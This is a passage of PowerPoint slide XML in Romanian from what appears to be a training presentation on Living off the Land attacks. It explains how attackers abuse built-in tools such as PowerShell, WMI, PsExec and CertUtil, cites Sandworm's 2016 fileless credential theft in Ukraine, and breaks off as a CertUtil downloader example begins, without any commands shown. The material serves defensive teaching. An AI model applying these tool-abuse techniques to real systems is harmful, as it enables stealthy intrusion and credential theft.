                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>Definiție</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>: Living Off </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t> Land se referă la atacuri cibernetice care folosesc unelte legitime, preinstalate în sistemul victimei (binar, scripturi, librării) în scopuri malițioase. În loc să descarce executabile malware noi, atacatorul reutilizează ceea ce este deja prezent în sistem. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="ro-RO" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Segoe UI Web (West European)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>Originea termenului: Expresia este împrumutată din tactici de supraviețuire. În context informatic, atacatorul „supraviețuiește” folosind mediul software al victimei.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="ro-RO" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Segoe UI Web (West European)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>Ideea de bază: Nu este nevoie de malware personalizat. Atacul se camuflează în activitatea normală a sistemului, deoarece folosește chiar programele standard ale sistemului – doar că în scopuri rău intenționate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1EBD0C0-EB5C-6E04-2C5C-30DDE4C92372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="720725"/>
            <a:ext cx="11425073" cy="568960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t>Ce e Living Off the Land?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D3314E7-F0FD-53EE-5DD7-73120215566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2965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78F2A-5A41-6FDB-EE8B-8515414FDE0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475FE04-BED3-5C92-A047-FC9EEC5E6E07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412219" y="1871625"/>
            <a:ext cx="7309381" cy="4688973"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>Folosesc instrumentar de încredere: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>Atacatorii se folosesc de unelte care sunt deja de încredere și permise în mediu. Multe dintre uneltele de administrare (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>, WMI, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t> etc.) sunt semnate digital de Microsoft și adesea sunt incluse în listele de permisiuni ale politicilor de securitate. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="ro-RO" b="1" dirty="0">
              <a:latin typeface="Segoe UI Web (West European)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="ro-RO" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Segoe UI Web (West European)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>Unelte pentru fiecare etapă: Aceste unelte preinstalate sunt extrem de puternice și flexibile, acoperind practic fiecare etapă a unui atac. Există comenzi native pentru recunoaștere, mișcare laterală, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>exfiltrare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t> de date și altele.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="ro-RO" dirty="0">
              <a:latin typeface="Segoe UI Web (West European)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="ro-RO" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Segoe UI Web (West European)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>Camuflare în activitatea normală: Activitățile realizate prin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>LOtL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t> seamănă adesea cu sarcini administrative sau operațiuni de sistem obișnuite. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ro-RO" dirty="0">
              <a:latin typeface="Segoe UI Web (West European)"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D73483A1-E8DB-F509-87E7-974FE8A1EF8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="720725"/>
            <a:ext cx="11425073" cy="568960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t>De </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" err="1"/>
              <a:t>ce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t> sunt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" err="1"/>
              <a:t>eficiente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" err="1"/>
              <a:t>aceste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" err="1"/>
              <a:t>atacuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{432988D1-CD96-E629-530D-96203E9EF83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7841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EBE5-B4C3-50E6-8CA7-BC34724E5B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D3A626-EFBE-8F75-5587-D7E42510CA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972800" y="0"/>
            <a:ext cx="1219200" cy="3918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7" name="Title 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDF2C278-A6A5-B251-F32A-6C91CCA71F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ex. 1: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Fileless PowerShell</a:t>
            </a:r>
            <a:endParaRPr lang="en-RO" sz="3600" b="1">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16BCC102-45E8-C14F-DFC3-38D2A68C2BEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380390" y="1091531"/>
            <a:ext cx="8347328" cy="78009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200">
              <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="TextBox 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F49DCD78-6C7C-EB66-74B7-9025F866E7BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248090" y="2463478"/>
            <a:ext cx="468716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1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Context: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>în</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2016, un actor statal (Sandworm team) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>atacă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rețeaua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>elctrică</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> din </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ucraina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cu un script PowerShell care </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execută</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilitar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>furt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>credențiale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> direct din </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memorie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Zero malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>salvat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pe disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Zero </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alerte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>soluția</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>securitate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mișcare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> lateral: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WinRM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bitdefender_PHASR_Stop_Stealthy_Attacks_Using_Living_off_the_Land_Techniques (1).mp4">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{018A7DB3-B04E-B6E5-E2B3-50929EDCC6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29778" y="1691014"/>
            <a:ext cx="6830943" cy="4290686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32393124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D6332-6287-7D90-7D7B-7F089D6426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86A911-4F85-F4EA-3955-66CD2C949F1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972800" y="0"/>
            <a:ext cx="1219200" cy="3918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7" name="Title 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B6ED3A6-E028-4827-0366-AC533C28A4AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380390" y="1091531"/>
            <a:ext cx="8347328" cy="780095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ex. 2: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Downloader / Dropper cu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CertUtil</a:t>
            </a:r>
            <a:endParaRPr lang="en-RO" sz="3600" b="1">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402B04C3-431C-E387-AD87-4D0E0D8EDD44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380390" y="1091531"/>
            <a:ext cx="8347328" cy="78009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200">
              <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="TextBox 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4189CFFA-DAD8-F948-C1BB-ED86105F4F2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248088" y="2463478"/>
            <a:ext cx="11532786"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1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenariu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>atacator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are </a:t>
            </a:r>
